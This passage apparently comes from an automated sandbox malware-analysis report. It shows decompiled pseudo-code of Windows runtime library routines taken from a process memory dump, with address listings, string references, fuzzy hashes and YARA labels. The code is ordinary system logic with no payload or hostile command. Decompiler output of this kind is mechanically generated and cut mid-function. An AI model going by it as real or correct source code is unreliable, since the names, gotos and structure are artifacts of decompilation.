							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E055B6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E055B76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E05648938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E055AB150();
													}
													_t116 = E05646D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E055B75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x5698638; // 0x0
																	_t122 = L055B38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E055B76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E055B76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L055DFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L055B70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E055DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E055DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E055DFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E055DFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E055DFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x5697b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x5697b84 = _t75;
						_t73 = E055BEB70(_t134, 0x5697b60);
						if( *0x5697b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E055BFF60( *0x5697b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                        0x055dfab0
                                                                        0x055dfab2
                                                                        0x055dfab3
                                                                        0x055dfab4
                                                                        0x055dfabc
                                                                        0x055dfac0
                                                                        0x055dfb14
                                                                        0x055dfb17
                                                                        0x055dfac2
                                                                        0x055dfac8
                                                                        0x055dfacd
                                                                        0x055dfad3
                                                                        0x055dfad3
                                                                        0x055dfadd
                                                                        0x055dfb18
                                                                        0x055dfb1b
                                                                        0x055dfb1d
                                                                        0x055dfb1e
                                                                        0x055dfb1f
                                                                        0x055dfb20
                                                                        0x055dfb21
                                                                        0x055dfb22
                                                                        0x055dfb23
                                                                        0x055dfb24
                                                                        0x055dfb25
                                                                        0x055dfb26
                                                                        0x055dfb27
                                                                        0x055dfb28
                                                                        0x055dfb29
                                                                        0x055dfb2a
                                                                        0x055dfb2b
                                                                        0x055dfb2c
                                                                        0x055dfb2d
                                                                        0x055dfb2e
                                                                        0x055dfb2f
                                                                        0x055dfb3a
                                                                        0x055dfb3b
                                                                        0x055dfb3e
                                                                        0x055dfb41
                                                                        0x055dfb44
                                                                        0x055dfb47
                                                                        0x055dfb4a
                                                                        0x055dfb4d
                                                                        0x055dfb53
                                                                        0x0561bdcb
                                                                        0x0561bdcb
                                                                        0x055dfb59
                                                                        0x055dfb5b
                                                                        0x055dfb5b
                                                                        0x055dfb5e
                                                                        0x0561bdd5
                                                                        0x0561bdd8
                                                                        0x00000000
                                                                        0x0561bdda
                                                                        0x00000000
                                                                        0x0561bdda
                                                                        0x055dfb64
                                                                        0x055dfb64
                                                                        0x055dfb64
                                                                        0x055dfb67
                                                                        0x055dfb6e
                                                                        0x055dfb70
                                                                        0x055dfb72
                                                                        0x00000000
                                                                        0x055dfb78
                                                                        0x055dfb7a
                                                                        0x055dfb7a
                                                                        0x055dfb7d
                                                                        0x055dfb80
                                                                        0x0561bddf
                                                                        0x0561bde1
                                                                        0x00000000
                                                                        0x0561bde3
                                                                        0x00000000
                                                                        0x0561bde3
                                                                        0x055dfb86
                                                                        0x055dfb86
                                                                        0x055dfb86
                                                                        0x055dfb8b
                                                                        0x055dfb90
                                                                        0x055dfb92
                                                                        0x055dfb94
                                                                        0x055dfb9a
                                                                        0x055dfb9b
                                                                        0x055dfba1
                                                                        0x0561bde8
                                                                        0x0561bdeb
                                                                        0x0561bded
                                                                        0x0561beb5
                                                                        0x0561beb5
                                                                        0x0561bebb
                                                                        0x0561bebd
                                                                        0x0561bec3
                                                                        0x0561bed2
                                                                        0x0561bedd
                                                                        0x0561bedd
                                                                        0x0561beed
                                                                        0x00000000
                                                                        0x0561bdf3
                                                                        0x0561bdfe
                                                                        0x0561be06
                                                                        0x0561be0b
                                                                        0x0561be0d
                                                                        0x0561be0f
                                                                        0x0561be14
                                                                        0x0561be19
                                                                        0x0561be20
                                                                        0x0561be25
                                                                        0x0561be27
                                                                        0x0561be35
                                                                        0x0561be39
                                                                        0x0561be46
                                                                        0x0561be4f
                                                                        0x0561be54
                                                                        0x0561be56
                                                                        0x0561bef8
                                                                        0x0561bef8
                                                                        0x00000000
                                                                        0x0561be5c
                                                                        0x0561be5c
                                                                        0x0561be60
                                                                        0x00000000
                                                                        0x0561be66
                                                                        0x0561be66
                                                                        0x0561be7f
                                                                        0x0561be84
                                                                        0x0561be87
                                                                        0x0561be89
                                                                        0x0561be8b
                                                                        0x0561be99
                                                                        0x0561be9d
                                                                        0x0561bea0
                                                                        0x0561beac
                                                                        0x0561beaf
                                                                        0x0561beb1
                                                                        0x0561beb3
                                                                        0x0561beb3
                                                                        0x00000000
                                                                        0x0561bea2
                                                                        0x0561bea2
                                                                        0x00000000
                                                                        0x0561bea2
                                                                        0x0561be8d
                                                                        0x0561be8d
                                                                        0x0561be92
                                                                        0x00000000
                                                                        0x0561be92
                                                                        0x0561be8b
                                                                        0x0561be60
                                                                        0x0561be3b
                                                                        0x0561be3b
                                                                        0x0561be3e
                                                                        0x00000000
                                                                        0x0561be40
                                                                        0x0561be40
                                                                        0x0561be44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561be44
                                                                        0x0561be3e
                                                                        0x0561be29
                                                                        0x0561be29
                                                                        0x00000000
                                                                        0x0561be29
                                                                        0x0561be27
                                                                        0x00000000
                                                                        0x055dfba7
                                                                        0x055dfba7
                                                                        0x055dfbab
                                                                        0x0561bf02
                                                                        0x055dfbb1
                                                                        0x055dfbb1
                                                                        0x055dfbb8
                                                                        0x055dfbbd
                                                                        0x055dfbbd
                                                                        0x055dfbbf
                                                                        0x055dfbbf
                                                                        0x055dfbc5
                                                                        0x055dfbcb
                                                                        0x055dfbf8
                                                                        0x055dfbf8
                                                                        0x055dfbfa
                                                                        0x00000000
                                                                        0x055dfc00
                                                                        0x055dfc00
                                                                        0x055dfc03
                                                                        0x00000000
                                                                        0x055dfc09
                                                                        0x055dfc09
                                                                        0x055dfc0f
                                                                        0x055dfc15
                                                                        0x055dfc23
                                                                        0x055dfc23
                                                                        0x055dfc25
                                                                        0x055dfc27
                                                                        0x055dfc75
                                                                        0x055dfc7c
                                                                        0x055dfc84
                                                                        0x00000000
                                                                        0x055dfc29
                                                                        0x055dfc29
                                                                        0x055dfc2d
                                                                        0x055dfc30
                                                                        0x0561bf0f
                                                                        0x00000000
                                                                        0x055dfc36
                                                                        0x055dfc38
                                                                        0x055dfc3b
                                                                        0x055dfc41
                                                                        0x0561bf17
                                                                        0x0561bf19
                                                                        0x0561bf48
                                                                        0x0561bf4b
                                                                        0x00000000
                                                                        0x0561bf1b
                                                                        0x0561bf22
                                                                        0x0561bf24
                                                                        0x0561bf26
                                                                        0x00000000
                                                                        0x0561bf2c
                                                                        0x0561bf37
                                                                        0x0561bf39
                                                                        0x0561bf3b
                                                                        0x00000000
                                                                        0x0561bf41
                                                                        0x0561bf41
                                                                        0x0561bf41
                                                                        0x0561bf41
                                                                        0x0561bf45
                                                                        0x00000000
                                                                        0x0561bf45
                                                                        0x0561bf3b
                                                                        0x0561bf26
                                                                        0x00000000
                                                                        0x055dfc47
                                                                        0x055dfc47
                                                                        0x055dfc49
                                                                        0x055dfcb2
                                                                        0x055dfcb4
                                                                        0x055dfcb6
                                                                        0x055dfcdc
                                                                        0x055dfcdc
                                                                        0x00000000
                                                                        0x055dfcb8
                                                                        0x055dfcc3
                                                                        0x055dfcc5
                                                                        0x055dfcc7
                                                                        0x00000000
                                                                        0x055dfcc9
                                                                        0x055dfcc9
                                                                        0x055dfccd
                                                                        0x00000000
                                                                        0x055dfccd
                                                                        0x055dfcc7
                                                                        0x00000000
                                                                        0x055dfc4b
                                                                        0x055dfc4b
                                                                        0x055dfc4e
                                                                        0x055dfc4e
                                                                        0x055dfc51
                                                                        0x055dfc51
                                                                        0x055dfc54
                                                                        0x055dfc5a
                                                                        0x055dfc5c
                                                                        0x055dfc5f
                                                                        0x055dfc61
                                                                        0x055dfc63
                                                                        0x055dfc65
                                                                        0x055dfc67
                                                                        0x055dfc6e
                                                                        0x055dfc72
                                                                        0x055dfc72
                                                                        0x055dfc72
                                                                        0x055dfc72
                                                                        0x055dfc67
                                                                        0x055dfc61
                                                                        0x00000000
                                                                        0x055dfc5a
                                                                        0x055dfc49
                                                                        0x055dfc41
                                                                        0x055dfc30
                                                                        0x055dfc27
                                                                        0x055dfc03
                                                                        0x055dfbcd
                                                                        0x055dfbd3
                                                                        0x055dfbd9
                                                                        0x055dfbdc
                                                                        0x055dfbde
                                                                        0x055dfc99
                                                                        0x055dfc9b
                                                                        0x055dfc9d
                                                                        0x055dfcd5
                                                                        0x055dfcd5
                                                                        0x055dfc89
                                                                        0x055dfc89
                                                                        0x00000000
                                                                        0x055dfc9f
                                                                        0x055dfc9f
                                                                        0x055dfca3
                                                                        0x00000000
                                                                        0x055dfca3
                                                                        0x00000000
                                                                        0x055dfbe4
                                                                        0x055dfbe4
                                                                        0x055dfbe4
                                                                        0x055dfbe4
                                                                        0x055dfbe9
                                                                        0x055dfbf2
                                                                        0x00000000
                                                                        0x055dfbf2
                                                                        0x055dfbde
                                                                        0x055dfbcb
                                                                        0x055dfbab
                                                                        0x055dfc8b
                                                                        0x055dfc8b
                                                                        0x055dfc8c
                                                                        0x055dfb80
                                                                        0x055dfb72
                                                                        0x055dfb5e
                                                                        0x055dfc8d
                                                                        0x055dfc91
                                                                        0x055dfadf
                                                                        0x055dfadf
                                                                        0x055dfae1
                                                                        0x055dfae4
                                                                        0x055dfae7
                                                                        0x055dfaec
                                                                        0x055dfaf8
                                                                        0x055dfb00
                                                                        0x055dfb07
                                                                        0x055dfb0f
                                                                        0x055dfb0f
                                                                        0x055dfb07
                                                                        0x00000000
                                                                        0x055dfaf8
                                                                        0x055dfadd

                                                                        Strings
                                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0561BE0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                        • API String ID: 0-865735534
                                                                        • Opcode ID: 0b9f01b4636ad765e0138eeaeb90fb9c1ae43a368c7aa4392c54aea1124ab206
                                                                        • Instruction ID: c08648fa4ac9aee66bcb6bed0f4e4901aa3813dde24cd1e5f41adf8b5af2346f
                                                                        • Opcode Fuzzy Hash: 0b9f01b4636ad765e0138eeaeb90fb9c1ae43a368c7aa4392c54aea1124ab206
                                                                        • Instruction Fuzzy Hash: A3A1E432B1460A8BEB35DF68C454BBAB7A5BF48710F084569E807CB7A0DB34D941CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055A2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 63%
                                                                        			E055A2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x5695350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x5697bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E055E97C0();
				}
				if( *0x56979c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x56979c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E055D1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E055C7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0563FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E055E9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E055DE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L055FDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x5696901;
								_push(_t109);
								_v52 = _t98;
								if( *0x5696901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E055E9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E055E95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E055C7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E055C7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E05627016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0563FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x5695350;
							if(_t109 != 0x5695350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0563FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E05635720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                        0x055a2d8a
                                                                        0x055a2d8a
                                                                        0x055a2d92
                                                                        0x055a2d96
                                                                        0x055a2d9e
                                                                        0x055a2da0
                                                                        0x055a2da3
                                                                        0x055a2da5
                                                                        0x055a2da8
                                                                        0x055a2dab
                                                                        0x055a2db2
                                                                        0x055ff9aa
                                                                        0x055ff9ab
                                                                        0x055ff9ae
                                                                        0x055ff9ae
                                                                        0x055a2db8
                                                                        0x055a2dc2
                                                                        0x055ff9b9
                                                                        0x055ff9be
                                                                        0x055ff9bf
                                                                        0x055ff9bf
                                                                        0x055a2dcf
                                                                        0x055ff9c9
                                                                        0x055a2dd5
                                                                        0x055a2dd5
                                                                        0x055a2dd5
                                                                        0x055a2dde
                                                                        0x055a2de1
                                                                        0x055a2e70
                                                                        0x055a2e72
                                                                        0x055a2e72
                                                                        0x055a2de7
                                                                        0x055a2deb
                                                                        0x055a2e7c
                                                                        0x055a2e83
                                                                        0x055a2e85
                                                                        0x055a2e8b
                                                                        0x055a2e8d
                                                                        0x055a2e92
                                                                        0x055a2e92
                                                                        0x055a2e85
                                                                        0x055a2df1
                                                                        0x055a2df7
                                                                        0x055a2df9
                                                                        0x055a2df9
                                                                        0x055a2dfc
                                                                        0x055a2dff
                                                                        0x055a2e02
                                                                        0x00000000
                                                                        0x055a2e05
                                                                        0x055a2e0c
                                                                        0x055ff9d9
                                                                        0x055a2e12
                                                                        0x055a2e12
                                                                        0x055a2e12
                                                                        0x055a2e1a
                                                                        0x055ff9e3
                                                                        0x055ff9e9
                                                                        0x055ff9f0
                                                                        0x055ff9f6
                                                                        0x055ff9f8
                                                                        0x055ff9f8
                                                                        0x055ff9f0
                                                                        0x055a2e23
                                                                        0x055ffa02
                                                                        0x055ffa03
                                                                        0x055ffa05
                                                                        0x055ffa06
                                                                        0x00000000
                                                                        0x055a2e29
                                                                        0x055a2e29
                                                                        0x055a2e2e
                                                                        0x055a2e34
                                                                        0x055a2e3e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055a2e44
                                                                        0x055a2e47
                                                                        0x055a2e4d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055a2e4f
                                                                        0x055a2e54
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055a2e5a
                                                                        0x055a2e5f
                                                                        0x055a2e9a
                                                                        0x055a2ea4
                                                                        0x055a2ea5
                                                                        0x055a2ea8
                                                                        0x055a2eaf
                                                                        0x055a2eb2
                                                                        0x055a2eb5
                                                                        0x055ffae9
                                                                        0x055ffaeb
                                                                        0x055ffaed
                                                                        0x055ffaef
                                                                        0x055ffaf7
                                                                        0x055ffaf8
                                                                        0x055ffafd
                                                                        0x055ffaff
                                                                        0x055ffb04
                                                                        0x055ffb04
                                                                        0x055ffaff
                                                                        0x055a2ec0
                                                                        0x055a2ec4
                                                                        0x055a2ec6
                                                                        0x055a2ec8
                                                                        0x055ffb14
                                                                        0x055ffb18
                                                                        0x055ffb1e
                                                                        0x055ffb21
                                                                        0x055ffb21
                                                                        0x055a2ece
                                                                        0x055a2ece
                                                                        0x055a2ece
                                                                        0x055a2ed7
                                                                        0x055a2e61
                                                                        0x055a2e63
                                                                        0x055ffa6b
                                                                        0x055ffa71
                                                                        0x055ffa76
                                                                        0x055ffa78
                                                                        0x055ffa8a
                                                                        0x055ffa7a
                                                                        0x055ffa83
                                                                        0x055ffa83
                                                                        0x055ffa8f
                                                                        0x055ffa91
                                                                        0x055ffa97
                                                                        0x055ffa9d
                                                                        0x055ffaa4
                                                                        0x055ffaaa
                                                                        0x055ffaaf
                                                                        0x055ffab1
                                                                        0x055ffac3
                                                                        0x055ffab3
                                                                        0x055ffabc
                                                                        0x055ffabc
                                                                        0x055ffac8
                                                                        0x055ffacb
                                                                        0x055ffadf
                                                                        0x055ffadf
                                                                        0x055ffacb
                                                                        0x055ffaa4
                                                                        0x055ffa91
                                                                        0x055a2e6f
                                                                        0x055a2e6f
                                                                        0x055a2e5f
                                                                        0x055ffa13
                                                                        0x055ffa15
                                                                        0x055ffa17
                                                                        0x055ffa1f
                                                                        0x055ffa21
                                                                        0x055ffa22
                                                                        0x055ffa25
                                                                        0x055ffa28
                                                                        0x055ffa2f
                                                                        0x055ffa2f
                                                                        0x055ffa2a
                                                                        0x055ffa2a
                                                                        0x055ffa2a
                                                                        0x055ffa31
                                                                        0x055ffa34
                                                                        0x055ffa36
                                                                        0x055ffa3c
                                                                        0x055ffa3e
                                                                        0x055ffa41
                                                                        0x055ffa43
                                                                        0x055ffa45
                                                                        0x055ffa45
                                                                        0x055ffa41
                                                                        0x055ffa3c
                                                                        0x055ffa4a
                                                                        0x055ffa4f
                                                                        0x055ffa51
                                                                        0x055ffa53
                                                                        0x055ffa56
                                                                        0x055ffa5b
                                                                        0x055ffa5e
                                                                        0x00000000
                                                                        0x055ffa5e
                                                                        0x055a2e23

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Re-Waiting
                                                                        • API String ID: 0-316354757
                                                                        • Opcode ID: 4dcedde44097ac7b154c984399b8cdbb509a60eb9958c001b3aa4b13654f11b0
                                                                        • Instruction ID: 3791bcf8ad6a0d5a53d36dacd16705eb3ef132b9c5a791aaa870e5ceff786ca3
                                                                        • Opcode Fuzzy Hash: 4dcedde44097ac7b154c984399b8cdbb509a60eb9958c001b3aa4b13654f11b0
                                                                        • Instruction Fuzzy Hash: 41616332B04645AFCB21DF68C885B7EB7B6FF44310F1406A9E952A7AC2D7349941CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05670EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E05670EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0566FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E05671074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
